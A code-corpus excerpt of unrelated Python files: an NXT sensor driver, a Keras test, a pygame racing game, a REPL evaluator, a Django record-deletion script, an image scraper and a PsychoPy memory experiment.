self._SCALE_CONSTANT / self.get_processed_value()\n return result\n\n except ZeroDivisionError:\n return self._SCALE_CONSTANT\n \n get_sample = get_scaled_value\n\n\nclass Colorv2(BaseDigitalSensor):\n \"\"\"Object for HiTechnic Color v2 Sensors. Coded to HiTechnic's specs for the sensor\nbut not tested. Please report whether this worked for you or not!\"\"\"\n I2C_ADDRESS = BaseDigitalSensor.I2C_ADDRESS.copy()\n I2C_ADDRESS.update({\n 'mode': (0x41, 'B'),\n 'number': (0x42, 'B'),\n 'red': (0x43, 'B'),\n 'green': (0x44, 'B'),\n 'blue': (0x45, 'B'),\n 'white': (0x46, 'B'),\n 'index': (0x47, 'B'),\n 'normred': (0x48, 'B'),\n 'normgreen': (0x49, 'B'),\n 'normblue': (0x4A, 'B'),\n 'all_data': (0x42, '9B'),\n 'rawred': (0x42, 'l'),\n 'm1mode': (0x44, 'B'),\n 'm1power': (0x45, 'b'),\n 'm2power': (0x46, 'b'),\n 'm2mode': (0x47, 'B'),\n 'm2enctarget': (0x48, '>l'),\n 'm1enccurrent': (0x4c, '>l'),\n 'm2enccurrent': (0x50, '>l'),\n 'batteryvoltage': (0x54, '2B'),\n 'm1gearratio': (0x56, 'b'),\n 'm1pid': (0x57, '3B'),\n 'm2gearratio': (0x5a, 'b'),\n 'm2pid': (0x5b, '3B'),\n })\n \n class PID_Data():\n def __init__(self, p, i, d):\n self.p, self.i, self.d = p, i, d\n \n def __init__(self, brick, port, check_compatible=True):\n super(MotorCon, self).__init__(brick, port, check_compatible)\n \n def set_enc_target(self, mot, val):\n \"\"\"Set the encoder target (-2147483648-2147483647) for a motor\n \"\"\"\n self.write_value('m%denctarget'%mot, (val, ))\n \n def get_enc_target(self, mot):\n \"\"\"Get the encoder target for a motor\n \"\"\"\n return self.read_value('m%denctarget'%mot)[0]\n \n def get_enc_current(self, mot):\n \"\"\"Get the current encoder value for a motor\n \"\"\"\n return self.read_value('m%denccurrent'%mot)[0]\n \n def set_mode(self, mot, mode):\n \"\"\"Set the mode for a motor. This value is a bit mask and you can\nfind details about it in the sensor's documentation.\n \"\"\"\n self.write_value('m%dmode'%mot, (mode, ))\n \n def get_mode(self, mot):\n \"\"\"Get the mode for a motor. This value is a bit mask and you can\nfind details about it in the sensor's documentation.\n \"\"\"\n return self.read_value('m%dmode'%mot)[0]\n \n def set_power(self, mot, power):\n \"\"\"Set the power (-100-100) for a motor\n \"\"\"\n self.write_value('m%dpower'%mot, (power, ))\n \n def get_power(self, mot):\n \"\"\"Get the power for a motor\n \"\"\"\n return self.read_value('m%dpower'%mot)[0]\n \n def set_gear_ratio(self, mot, ratio):\n \"\"\"Set the gear ratio for a motor\n \"\"\"\n self.write_value('m%dgearratio'%mot, (ratio, ))\n \n def get_gear_ratio(self, mot):\n \"\"\"Get the gear ratio for a motor\n \"\"\"\n return self.read_value('m%dgearratio'%mot)[0]\n \n def set_pid(self, mot, piddata):\n \"\"\"Set the PID coefficients for a motor. Takes data in\nMotorCon.PID_Data(p, i, d) format.\n \"\"\"\n self.write_value('m%dpid'%mot, (piddata.p, piddata.i, piddata.d))\n \n def get_pid(self, mot):\n \"\"\"Get the PID coefficients for a motor. Returns a PID_Data() object.\n \"\"\"\n p, i, d = self.read_value('m%dpid'%mot)\n return self.PID_Data(p, i, d)\n \n def get_battery_voltage(self):\n \"\"\"Gets the battery voltage (in millivolts/20)\n \"\"\"\n high, low = self.read_value('bateryvoltage')[0]\n return high << 2 + low\n\nMotorCon.add_compatible_sensor(None, 'HiTechnc', 'MotorCon')\n","repo_name":"Bobeye/LinkMechanismStewartGouph","sub_path":"OFWTP/nxt/sensor/hitechnic.py","file_name":"hitechnic.py","file_ext":"py","file_size_in_byte":21178,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"78"} +{"seq_id":"11640385311","text":"import tensorflow as tf\nfrom keras import keras_parameterized, testing_utils\nfrom tfreplknet.block import Block\n\n\n@keras_parameterized.run_all_keras_modes\nclass TestBlock(keras_parameterized.TestCase):\n def test_layer(self):\n testing_utils.layer_test(\n Block,\n kwargs={'kernel_size': 13, 'small_kernel': 5, 'ratio': 1., 'dropout': 0.},\n input_shape=[2, 64, 64, 3],\n input_dtype='float32',\n expected_output_shape=[None, 64, 64, 3],\n expected_output_dtype='float32'\n )\n testing_utils.layer_test(\n Block,\n kwargs={'kernel_size': 31, 'small_kernel': None, 'ratio': 1.5, 'dropout': .2},\n input_shape=[2, 64, 64, 3],\n input_dtype='float32',\n expected_output_shape=[None, 64, 64, 3],\n expected_output_dtype='float32'\n )\n\n\nif __name__ == '__main__':\n tf.test.main()\n","repo_name":"shkarupa-alex/tfreplknet","sub_path":"tfreplknet/tests/test_block.py","file_name":"test_block.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"78"} +{"seq_id":"21189839448","text":"\nimport pygame as pg\nimport random as rd\nfrom settings import *\nfrom myutility import GameSprite, AnimateSprite\n\nclass Player(pg.sprite.Sprite):\n\t\"\"\"Player model of game.\"\"\"\n\tdef __init__(self, game):\n\t\tsuper().__init__()\n\t\tself.game = game\n\t\tself.run = GameSprite(PLAYER[\"normal\"])\n\t\tself.fly = AnimateSprite(PLAYER[\"fly\"])\n\t\t\n\t\tself.run.scale(PLAYER_SIZE)\n\t\tself.fly.scale((PLAYER_SIZE[0] + 80, PLAYER_SIZE[1] + 80), 2)\n\t\tself.fly.scale((PLAYER_SIZE[0] + 20, PLAYER_SIZE[1] + 20), 1, 3)\n\t\tself.fly.scale(PLAYER_SIZE, 0, 4)\n\t\tself.fly.setRandomTimes(FLY_TIMES)\n\t\t\n\t\tself.image = self.run.image\n\t\tself.rect = self.image.get_rect()\n\t\tself.rect.center = WIDTH / 2, HEIGHT - 200\n\t\t\n\t\tself.inside_rect = self.rect.copy()\n\t\tself.inside_rect.width = self.inside_rect.width / 3 + 6\n\t\tself.inside_rect.height -= 60\n\t\tself.inside_rect.center = self.rect.center\n\t\t\n\t\tself.vx = PLAYER_VEL\n\t\tself.pos = float(self.rect.centerx)\n\t\tself.moving_left = False\n\t\tself.moving_right = False\n\t\tself.bl_fly = False\n\t\tself.crashed = False\n\t\tself.car_passed = 1\n\t\t\n\tdef getRectAndCenter(self):\n\t\tcenter = self.rect.center\n\t\tself.rect = self.image.get_rect()\n\t\tself.rect.center = center\n\t\n\tdef update(self, dt):\n\t\tif self.moving_left and self.inside_rect.left >= self.game.road.rect.left + 30:\n\t\t\tself.pos -= self.vx * dt * PIXEL_PER_SECOND\n\t\tif self.moving_right and self.inside_rect.right <= self.game.road.rect.right - 30:\n\t\t\tself.pos += self.vx * dt * PIXEL_PER_SECOND\n\t\t\n\t\tself.rect.centerx = self.pos\n\t\tself.inside_rect.centerx = self.rect.centerx\n\t\t\n\t\tif self.bl_fly:\n\t\t\tif self.fly.randomTimeAnimate(dt*1000) != 0:\n\t\t\t\tself.image = self.fly.image\n\t\t\t\tself.getRectAndCenter()\n\t\t\telse:\n\t\t\t\tself.bl_fly = False\n\t\t\t\tself.image = self.run.image\n\t\t\t\tself.getRectAndCenter()\n\t\t\n\tdef draw(self, surf):\n\t\tsurf.blit(self.image, self.rect)\n\t\t\n\t\t\nclass FlyStats:\n\tdef __init__(self, road):\n\t\tself.button = GameSprite(IMG_DIR + \"up-chevron.png\")\n\t\tself.button.rect.center = road.rect.right + 40, 1000\n\t\t\n\t\tself.fly_bar = pg.Rect(0, 0, FLY_BLOCK_WIDTH, FLY_BLOCK_WIDTH * MAX_FLY)\n\t\tself.fly_current = pg.Rect(0, 0, FLY_BLOCK_WIDTH, FLY_BLOCK_WIDTH)\n\t\t\n\t\tself.fly_current.centerx = self.fly_bar.centerx = self.button.rect.centerx\n\t\tself.fly_current.bottom = self.fly_bar.bottom = self.button.rect.top + 12\n\t\t\n\t\tself.fly_current.h = FLY_BLOCK_WIDTH\n\t\tself.progress = [False] * 5\n\t\tself.count = 1\n\t\tself.max = False\n\t\t\n\tdef update(self):\n\t\tif not False in self.progress and not self.max:\n\t\t\tself.progress = [False] * 5\n\t\t\tself.count += 1\n\t\tif self.count == MAX_FLY:\n\t\t\tself.max = True\n\t\telse:\n\t\t\tself.max = False\n\t\t\n\t\tself.fly_current.h = FLY_BLOCK_WIDTH * self.count\n\t\tself.fly_current.bottom = self.button.rect.top + 12\n\t\t\n\tdef draw(self, surf):\n\t\tpg.draw.rect(surf, BLUE, self.fly_current, 0)\n\t\tpg.draw.rect(surf, BLACK, self.fly_bar, 4)\n\t\tsurf.blit(self.button.image, self.button.rect)\n\t\tif self.progress[1]:\n\t\t\tpg.draw.circle(surf, RED, self.button.rect.center, 60, 18, *self.progress[:-1])\n\t\n\t\nclass Car(GameSprite):\n\t\"\"\"Random car used to draw randomly.\"\"\"\n\tdef __init__(self, car):\n\t\tsuper().__init__(car[\"file\"])\n\t\tself.vy = car[\"vel\"]\n\t\t\n\t\tself.inside_rect = self.rect.copy()\n\t\tself.inside_rect.w = (self.inside_rect.w / 3) - car[\"minus\"][0]\n\t\tself.inside_rect.h -= car[\"minus\"][1]\n\t\t\n\t\tself.scale(car[\"size\"])\n\t\tself.flip(False, True)\n\t\tself.passed = False\n\t\t\n\tdef update(self, dt):\n\t\tself.rect.centery += (STRIP_VEL + self.vy) * dt * PIXEL_PER_SECOND\n\t\tself.inside_rect.centery += (STRIP_VEL + self.vy) * dt * PIXEL_PER_SECOND\n\t\tif self.rect.top >= HEIGHT:\n\t\t\tself.kill()\n\t\t\t\t\t\t\n\t\t\nclass AnimatedCar(pg.sprite.Sprite):\n\t\"\"\"A class of animated car.\"\"\"\n\tdef __init__(self, car):\n\t\tsuper().__init__()\n\t\t\n\t\tself.images = []\n\t\tself.index = 0\n\t\tself.vy = car[\"vel\"]\n\t\tself.frameCount = -1\n\t\t\n\t\tfor fn in car[\"file\"]:\n\t\t\timage = pg.image.load(fn)\n\t\t\timage = pg.transform.scale(image, car[\"size\"])\n\t\t\tself.images.append(pg.transform.flip(image, False, True))\n\t\t\t\n\t\tself.image = self.images[0]\n\t\tself.rect = self.image.get_rect()\n\t\t\n\t\tself.inside_rect = self.rect.copy()\n\t\tself.inside_rect.w = (self.inside_rect.w / 3) - car[\"minus\"][0]\n\t\tself.inside_rect.h -= car[\"minus\"][1]\n\t\t\n\t\tself.passed = False\n\t\t\t\n\tdef update(self, dt=1):\n\t\tself.rect.centery += (STRIP_VEL + self.vy) * dt * PIXEL_PER_SECOND\n\t\tself.inside_rect.centery += (STRIP_VEL + self.vy) * dt * PIXEL_PER_SECOND\n\t\tif self.frameCount == 0:\n\t\t\tself.index = (self.index + 1) % 3\n\t\t\tself.image = self.images[self.index]\n\t\tself.frameCount = (self.frameCount + 1) % 10\n\t\tif self.rect.top >= HEIGHT:\n\t\t\tself.kill()\n\t\t\n\tdef draw(self, surf):\n\t\tsurf.blit(self.image, self.rect)\n\t\t\n\nclass SideTrees(pg.sprite.Sprite):\n\t\"\"\"Brush class draw on side.\"\"\"\n\tdef __init__(self, road, tree):\n\t\tsuper().__init__()\n\t\t\n\t\tself.left = GameSprite(tree[\"filename\"])\n\t\tself.right = GameSprite(tree[\"filename\"])\n\t\t\n\t\tself.left.scale(tree[\"size\"])\n\t\tself.right.scale(tree[\"size\"])\n\t\tself.right.flip(True, False)\n\t\t\n\t\tself.left.rect.centerx = road.rect.left - 50\n\t\tself.right.rect.centerx = road.rect.right + 50\n\t\tself.left.rect.bottom = self.right.rect.bottom = HEIGHT\n\t\t\n\tdef update(self, dt=1):\n\t\tself.left.rect.y += STRIP_VEL * dt * PIXEL_PER_SECOND\n\t\tself.right.rect.y += STRIP_VEL * dt * PIXEL_PER_SECOND\n\t\tif self.left.rect.top >= HEIGHT:\n\t\t\tself.kill()\n\t\n\tdef draw(self, surf):\n\t\tsurf.blit(self.left.image, self.left.rect)\n\t\tsurf.blit(self.right.image, self.right.rect)\n\t\n\t\nclass Strips(pg.sprite.Sprite):\n\t\"\"\"Strip model draw on highway.\"\"\"\n\tdef __init__(self, road):\n\t\tsuper().__init__()\n\t\t\n\t\tself.rect1 = pg.Rect((0, 0), STRIP_SIZE)\n\t\tself.rect2 = pg.Rect((0, 0), STRIP_SIZE)\n\t\t\n\t\tx = ROAD_SIZE[0] / 3\n\t\tself.rect1.centerx = road.rect.left + x\n\t\tself.rect2.centerx = road.rect.left + x * 2\n\t\tself.rect1.bottom = self.rect2.bottom = HEIGHT\n\t\t\n\tdef update(self, dt=1):\n\t\t\"\"\"Update the strip\"\"\"\n\t\tself.rect1.y += STRIP_VEL * dt * PIXEL_PER_SECOND\n\t\tself.rect2.y += STRIP_VEL * dt * PIXEL_PER_SECOND\n\t\tif self.rect1.top >= HEIGHT:\n\t\t\tself.kill() \n\t\t\n\tdef draw(self, surf):\n\t\t\"\"\"Draw the rects.\"\"\"\n\t\tpg.draw.rect(surf, GRAY, self.rect1)\n\t\tpg.draw.rect(surf, GRAY, self.rect2)\n\t\t\n\t\t\nclass Sound:\n\tdef __init__(self):\n\t\tself.crash = pg.mixer.Sound(\"assets/audios/Crash.wav\")\n\t\tself.jump = pg.mixer.Sound(\"assets/audios/jump.wav\")\n\n\nclass Explosion(pg.sprite.Sprite):\n\tdef __init__(self, center):\n\t\tsuper().__init__()\n\t\t\n\t\tself.images = []\n\t\tfor fn in EXPLOSIONS:\n\t\t\timage = pg.transform.scale(pg.image.load(fn).convert_alpha(), (100, 100))\n\t\t\tself.images.append(image)\n\t\t\t\n\t\tself.image = self.images[0]\n\t\tself.rect = self.image.get_rect()\n\t\tself.rect.center = center\n\t\tself.fr = 0\n\t\tself.frame_rate = 50\n\t\tself.last_update = pg.time.get_ticks()\n\t\n\tdef update(self, dt=1):\n\t\tnow = pg.time.get_ticks()\n\t\tif now - self.last_update >= self.frame_rate:\n\t\t\tself.last_update = now\n\t\t\tself.fr += 1\n\t\t\tif self.fr == len(self.images):\n\t\t\t\tself.kill()\n\t\t\telse:\n\t\t\t\tcenter = self.rect.center\n\t\t\t\tself.image = self.images[self.fr]\n\t\t\t\tself.rect = self.image.get_rect()\n\t\t\t\tself.rect.center = center\n\t\n\tdef draw(self, surf):\n\t\tsurf.blit(self.image, self.rect)\n\t\t\n\nclass Score:\n\tdef __init__(self):\n\t\tself.font = pg.font.Font(FONT_DIR + 'score.ttf', 100)\n\t\tself.text_surf = self.font.render('0', True, WHITE)\n\t\tself.value = 0\n\t\t\n\tdef update(self):\n\t\tself.value += 1\n\t\tself.text_surf = self.font.render(str(self.value), True, WHITE)\n\t\t\n\tdef draw(self, surf):\n\t\tsurf.blit(self.text_surf, (20, 20))\n\t\t\n\t\t","repo_name":"pitubit/F1_Race","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":7394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26804582297","text":"from pathlib import Path\nimport pprint\n\nfrom ompy.evaluator import evaluate # , parevde_file\n\n\ndef evaluator(sourcef, targetf, force):\n if sourcef == '-':\n print(\n 'each line of input will be parsed -> evaluated -> deparsed',\n end=''\n )\n if targetf:\n if not force and Path(targetf).exists():\n raise FileExistsError(targetf)\n print( ', and written to', targetf )\n with open(targetf, 'w') as fp:\n try:\n while True:\n res = evaluate( input('> ') )\n pprint.pprint(res)\n print('\\t >>', targetf)\n fp.write('{' + res + '}')\n except (EOFError, KeyboardInterrupt):\n print('\\nbye!')\n else:\n print()\n while True:\n print('<', evaluate( input('> ')) )\n else:\n with open(sourcef, 'r') as fp:\n source = evaluate(fp.read())\n if targetf:\n with open(targetf, 'w') as fp:\n fp.write(source)\n else:\n pprint.pprint(source)\n","repo_name":"catb0t/ast-schemas","sub_path":"om/ompy/repl/evaluator.py","file_name":"evaluator.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"14925200670","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# Евгений Супрун, suprune20 at gmail.com, 2013\n# delete-doubles.py\n# -----------------\n#\n# Удаление т.н. \"двойников\" согласно соодержимому файлов\n# формата Microsoft Excel 2003. Имена файлов\n# передаются в качестве параметров.\n#\n# Каждый исходный файл (книга Excel) может состоять из одного\n# или нескольких листов. Дополнительн��е листы сформированы,\n# если число строк в первом листе (предыдущем листе)\n# превысит максимум для формата Excel 2003: 65535\n#\n# Поля в листе (листах):\n# 0. Пустое, для правке пользователем. Если заказчик\n# поставит там знак, то соответсвующий погибший \n# подлежит удалению из базы данных при дальнейшей\n# обработке выходного файла Excel.\n# 1. Ф И О. Оно же ссылка на правку данных о погибшем\n# 2. Звание\n# 3. Дата рождения: ДД.ММ.ГГГГ или ММ.ГГГГ или ГГГГ\n# 4. Дата смерти: ДД.ММ.ГГГГ или ММ.ГГГГ или ГГГГ\n# 5. Номер захоронения. Он же ссылка на правку захоронения\n# 6. Информация о захороненном\n#\n# Остальные колонки -- не для пользователя, а служебные\n# 7. uuid погибшего\n# 8. Фамилия\n# 9. Имя\n# 10. Отчество\n# 11. Номер захоронения\n#\n\n# this is from the beginning!\nfrom __future__ import print_function\n\nimport sys\n\nimport xlrd\n\nsys.path.append('/home/django/projects/mil')\nfrom django.core.management import setup_environ\nimport settings\nsetup_environ(settings)\n\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom common.models import Person\n\n# Номера соотв. колонок\n(UUID_COL, LAST_NAME_COL, FIRST_NAME_COL, PATRONYMIC_COL, BURIAL_COL,) = \\\n (8, 9, 10, 11, 12,)\n\ndef main():\n print(\"\\n\" + \\\n sys.argv[0] + \"\\n\" + \\\n \"-\" * len(sys.argv[0]) + \"\\n\" + \\\n u\"Удаление записей о воинах, отмеченных в файле Microsoft Excel\\n\",\n file=sys.stderr\n )\n if len(sys.argv) < 2:\n print(u\"Параметр(ы):\\n\" + \\\n u\" - файл(ы) Excel с записями, отмеченными на удаление\\n\" + \\\n u'Отчет:\\n' + \\\n u' - стандартный вывод\\n',\n file=sys.stderr\n )\n sys.exit(1)\n \n persons = Person.objects.all()\n \n count_deleted_all = 0\n count_errors = 0\n for xls in sys.argv[1:]:\n count_deleted_book = 0\n print (u\"ФАЙЛ:\".encode('utf-8'), end=' ')\n print (xls)\n try:\n book = xlrd.open_workbook(xls)\n except IOError:\n print (u\" ОШИБКА: Excel-файл не найден или ошибка чтения\")\n continue\n except:\n print (u\" ОШИБКА: неверный формат Excel-файла\")\n continue\n \n for sheet_name in sorted(list(book.sheet_names())):\n print (u\" лист:\".encode('utf-8'), end=' ')\n print (sheet_name)\n sheet = book.sheet_by_name(sheet_name)\n row = 0\n count_deleted_sheet = 0\n while row < sheet.nrows:\n cell0 = sheet.cell(row,0)\n if cell0.ctype == xlrd.XL_CELL_TEXT and cell0.value.strip():\n cell = sheet.cell(row,UUID_COL)\n if cell.ctype == xlrd.XL_CELL_TEXT and cell.value:\n try:\n p = persons.get(uuid=cell.value)\n try:\n fio = p.last_name\n if p.first_name:\n fio += ' ' + p.first_name\n if p.patronymic:\n fio += ' ' + p.patronymic\n p.delete()\n print(u\" Удален: (стр. %s) %s\" % (unicode(row+1), fio,))\n count_deleted_sheet += 1\n count_deleted_book += 1\n count_deleted_all += 1\n except:\n count_errors += 1\n print(u\" ОШИБКА удаления: строка %s\" % unicode(row+1))\n except ObjectDoesNotExist:\n count_errors += 1\n print(u\" ОШИБКА: строка %s, не найден погибший\" % unicode(row+1))\n row += 1\n print(u\" Удалено на листе: %d\" % count_deleted_sheet)\n print(u\"ИТОГО Удалено в файле: %d\" % count_deleted_book)\n print(u\"\\nВСЕГО удалено: %d\" % count_deleted_all)\n print(u\"ОШИБОК: %d\" % count_errors)\n\nmain()\n","repo_name":"6jlarogap/mil","sub_path":"contrib/delete-doubles.py","file_name":"delete-doubles.py","file_ext":"py","file_size_in_byte":5490,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41342066042","text":"import requests\nimport os\nimport re\nimport time\n\ni = 3\ndir_name = \"E:\\win10\\Pictures\\图趣网每日一图\" # 设置图片保存地址\nif not os.path.exists(dir_name):\n os.mkdir(dir_name) # 创建目录\nelse:\n print(\"文件已存在:\", dir_name)\nwhile i <= 14:\n html = \"http://www.tuquu.com/pic/index_%s.html\" % i\n response = requests.get(html)\n response.encoding = response.apparent_encoding # 设置编码格式,防乱码\n text = response.text # 主网页的html代码\n # print(text)\n htmls = re.findall(r'', text) # 匹配含有高清图的网址\n try:\n print(\"这是第%s页!\" % i)\n i += 1\n count = 0\n # print(htmls)\n for h in htmls:\n img_path = dir_name + '\\\\' + h[1] + '.jpg' # 设置图片路径\n if not os.path.exists(img_path):\n response1 = requests.get(h[0])\n response1.encoding = response1.apparent_encoding\n img_html = re.findall(r'.*?', response1.text) # 图片下载地址\n # print(\"匹配的所有内容:\", img_html)\n response2 = requests.get(img_html[0]) # 请求地址\n # print(img_html[0])\n with open(img_path, 'wb') as f:\n f.write(response2.content)\n count += 1\n print(\"第%s张:\" % count, h[1], \"保存成功。\")\n time.sleep(0.2)\n except Exception as e:\n print(\"爬取失败!错误如下:\")\n print(e)","repo_name":"ALiang-NO1/python-learn","sub_path":"Python爬虫/爬虫/requests/5爬取图趣网图片.py","file_name":"5爬取图趣网图片.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12336931092","text":"from __future__ import division\nfrom psychopy import visual, event, core, gui, parallel, monitors\nfrom psychopy.visual import ShapeStim, TextStim, Circle, Rect\nimport numpy as np\nimport random, csv\nimport eyelinker\nimport changedetection\nimport os\n\n##################\n#EXPERIMENT SETUP#\n##################\n\n#Things You May Want to Change\nntrials = 120 #must be a multiple of 4\nnblocks = 14\nnset = 4\nmax_per_quad = 2\nmin_distance = 4\ndist_from_fix = 6\nsame_key = 's'\ndiff_key = 'd'\nstim_size = 2\ndistractor_size = ((stim_size**2)/3.1415)**(1/2) \nsync = 'sync ' #must have space at end of string!\n\n#Color Setup\ndef color_convert(color):\n return [round(((n/127.5)-1), 2) for n in color]\n\nncolors = 7\ncolor_array_idx = [0,1,2,3,4,5,6]\ncolor_table =[\n [255, 0, 0],\n [0, 255, 0],\n [0, 0, 255],\n [255, 255, 0],\n [255, 0, 255],\n [0, 255, 255],\n [255, 128, 0]\n]\n\nrgb_table = []\nfor colorx in color_array_idx:\n rgb_table.append(color_convert(color_table[colorx]))\ngrey = color_convert([166,166,166])\n\n#Monitor Setup\nmonitor_name='Experiment Monitor' \nmonitor_width=53\nmonitor_distance=70\nmonitor_px=[1920, 1080]\n\nexperiment_monitor = monitors.Monitor(\n monitor_name, width=monitor_width,\n distance=monitor_distance)\nexperiment_monitor.setSizePix(monitor_px)\n\n#Instructions\ninstruct_text =(\n 'In this experiment you will be remembering colored squares.\\n\\n'\n 'Each trial will start with a fixation cross. '\n 'Do your best to keep your eyes on it at all times.\\n'\n 'Then, an array of colored squares and grey circles will appear.\\n'\n 'Remember the colored squares and their locations as best you can.\\n'\n 'Ignore the grey circles. You will not be tested on these.\\n'\n 'After a short delay, a colored square will reappear.\\n'\n 'If it has the SAME color as the previous square in its location, press the \"S\" key.\\n'\n 'If it has a DIFFERENT color, press the \"D\" key.\\n'\n 'If you are not sure, just take your best guess.\\n\\n'\n 'You will get breaks in between blocks.\\n'\n \"We'll start with some practice trials.\\n\\n\"\n 'Press the \"S\" key to start.'\n)\n\n#Misc Setup\ndata_lines_written = 0\nexperiment_info = {}\nexperiment_name = \"WST_18_exp1\"\ndata_keys = ['Subject',\n 'Age',\n 'Sex',\n 'Block',\n 'Trial',\n 'Timestamp',\n 'TrialType',\n 'SetSize',\n 'RT',\n 'CRESP',\n 'RESP',\n 'ACC',\n 'LocationTested',\n 'Locations',\n 'SampleColors',\n 'TestColors']\n\n###########\n#FUNCTIONS#\n###########\n\ndef get_experiment_info_dlg(additional_fields_dict=None):\n experiment_info = {\n 'Subject Number': '0',\n 'Age': '0',\n 'Sex': '',\n 'Experimenter Initials': 'WST',\n 'Unique Subject Identifier': '000000'\n } \n\n if additional_fields_dict is not None:\n experiment_info.update(additional_fields_dict)\n\n #Modifies experiment_info dict directly\n cont = gui.DlgFromDict(\n experiment_info, title=experiment_name,\n order=['Subject Number',\n 'Age',\n 'Sex',\n 'Experimenter Initials',\n 'Unique Subject Identifier'\n ],\n tip={'Unique Subject Identifier': 'From the cronus log'},\n screen = 1\n )\n\n if not cont.OK: exit()\n\n return experiment_info\n\ndef experiment_questions():\n question = {'Practice':'Y','Eyetracking':'Y','EEG':'Y','Stim Track':'Y'}\n\n cont = gui.DlgFromDict(\n question,title=experiment_name, fixed='Y/N',screen=1)\n \n if not cont.OK: \n question['Practice'] = 'n'\n question['Eyetracking'] = 'n'\n question['EEG'] = 'n'\n question['Stim Track'] = 'n'\n\n return question\n\ndef setup_stim():\n #main window\n win = visual.Window(monitor = experiment_monitor, fullscr = True, units='deg')\n\n #fixation cross\n fix = TextStim(win, pos = [0,0], text='+', color=[-1, -1, -1], height = 32, units='pix')\n\n #stimulus\n square = visual.Rect(win, lineColor=None, fillColor=[0,0,0], fillColorSpace='rgb', width=stim_size, height=stim_size,units='deg')\n circle = visual.Circle(win, lineColor=None, fillColor=grey, fillColorSpace='rgb', radius=distractor_size,units='deg')\n white_track = visual.Circle(win, lineColor=None, fillColor = [1,1,1], fillColorSpace='rgb',radius=20, pos = [930,510],units='pix')\n black_track = visual.Circle(win, lineColor=None, fillColor = [-1,-1,-1], fillColorSpace='rgb',radius=20, pos = [930,510],units='pix')\n\n return win, fix, square, circle, white_track, black_track\n\ndef open_csv(experiment_info):\n #Create file name for csv\n file_name = experiment_name + '_' + experiment_info['Subject Number'] + '.csv'\n #write the headers for csv\n with open(file_name, 'wb') as csvfile:\n writer = csv.DictWriter(csvfile, fieldnames=data_keys)\n writer.writeheader()\n return file_name\n\ndef write_to_csv(data, file_name):\n with open(file_name, 'ab') as csvfile:\n writer = csv.DictWriter(csvfile, fieldnames = data_keys)\n writer.writerow(data)\n \n#Text Screen\n#Useful for instructions, break screens, end experiment\ndef text_screen(\n text = '', text_color = [-1,-1,-1], text_height = 36, win = None,\n bg_color = [0,0,0], wait_for_input = True, input_keys = None):\n\n backgroundRect = visual.Rect(\n win, fillColor=bg_color, units='norm',\n width=20, height=20)\n\n textObject = visual.TextStim(\n win, text=text, color=text_color, units='pix',\n height=text_height, alignHoriz='center', alignVert='center',\n wrapWidth=round(.8*win.size[0]))\n\n backgroundRect.draw()\n textObject.draw()\n win.flip()\n\n keys = None\n\n if wait_for_input:\n core.wait(0.2) #prevents accidental keypresses\n keys = event.waitKeys(keyList = input_keys)\n win.flip()\n\n return keys\n\n#make the parameters for current block trials\ndef make_block():\n diff_trials = np.tile([0,1], ntrials//2) #0101... for ntrials\n diff_trials = np.random.permutation(diff_trials) #randomized 0s and 1s\n \n num_stim = np.tile([1,2,3,4], ntrials//4) #1,2,3,4,5 for n trials, assumes divisible by 5\n num_stim = np.random.permutation(num_stim) #randomize\n \n num_gstim = 5 - num_stim \n\n return num_stim, diff_trials, num_gstim\n\ndef _which_quad(loc):\n if loc[0] < 0 and loc[1] < 0:\n return 0\n elif loc[0] >= 0 and loc[1] < 0:\n return 1\n elif loc[0] < 0 and loc[1] >= 0:\n return 2\n else:\n return 3\n\n#check if locs are too close to eachother or the fixation\ndef _too_close(attempt, locs):\n if np.linalg.norm(np.array(attempt)) < min_distance:\n return True # Too close to center\n\n for loc in locs:\n if np.linalg.norm(np.array(attempt) - np.array(loc)) < min_distance:\n return True # Too close to another square\n\n return False\n\n#generate locations for stimuli\ndef make_locs(itrial):\n quad_count = [0,0,0,0]\n locs = []\n counter = 0\n while len(locs) < 5:\n counter += 1\n if counter > 1000:\n raise ValueError('Timeout -- Cannot generate locations with given values.')\n \n attempt = [random.uniform(-dist_from_fix, dist_from_fix) for _ in range(2)]\n \n if _too_close(attempt, locs):\n continue\n\n if max_per_quad is not None:\n quad = _which_quad(attempt)\n if max(quad_count) > 0:\n if sum(quad_count) >= 4:\n if quad_count[quad] < max_per_quad:\n locs.append(attempt)\n quad_count[quad] += 1\n else:\n if quad_count[quad] < max_per_quad:\n if quad_count[quad] < max(quad_count):\n locs.append(attempt)\n quad_count[quad] += 1\n else: \n locs.append(attempt)\n quad_count[quad] += 1\n else:\n locs.append(attempt)\n print(locs)\n return locs\n\ndef make_trial(diff_trials, num_stim, num_gstim, itrial):\n #pick colors for stim, it is the size of the num of stim for this trial\n stim_color_idx = np.random.choice(color_array_idx, size = num_stim[itrial], replace = False)\n \n #preallocating stim color matrix\n stim_color = np.zeros(shape = [num_stim[itrial],3]) \n\n #loop thru for num of stim and choose a color for each stim\n for istim in range(num_stim[itrial]):\n stim_color[istim] = rgb_table[stim_color_idx[istim]]\n\n #calls the make_locs function and returns num_stim number of x,y locations\n locs = make_locs(itrial)\n #arbitrarily always test on the first loc\n test_loc = locs[0]\n\n #correct response keys and test color\n if diff_trials[itrial] == 0: #same trials\n cresp = same_key\n #make stim test color match stim color (test loc is always first loc which has first color)\n test_color = stim_color[0]\n else: #different trials\n cresp = diff_key\n #any color that isn't the first one\n other_color = np.setdiff1d(color_array_idx,stim_color_idx[1:])\n #choose randomly from temp which is anything that isn't a stim color\n test_color_idx = np.random.choice(other_color,size=1)\n test_color = rgb_table[int(test_color_idx)]\n\n trial = {\n 'set_size': num_stim[itrial],\n 'trial_type': diff_trials[itrial],\n 'cresp': cresp,\n 'locations': locs,\n 'stim_colors': stim_color,\n 'test_color': test_color,\n 'test_location': test_loc,\n }\n return 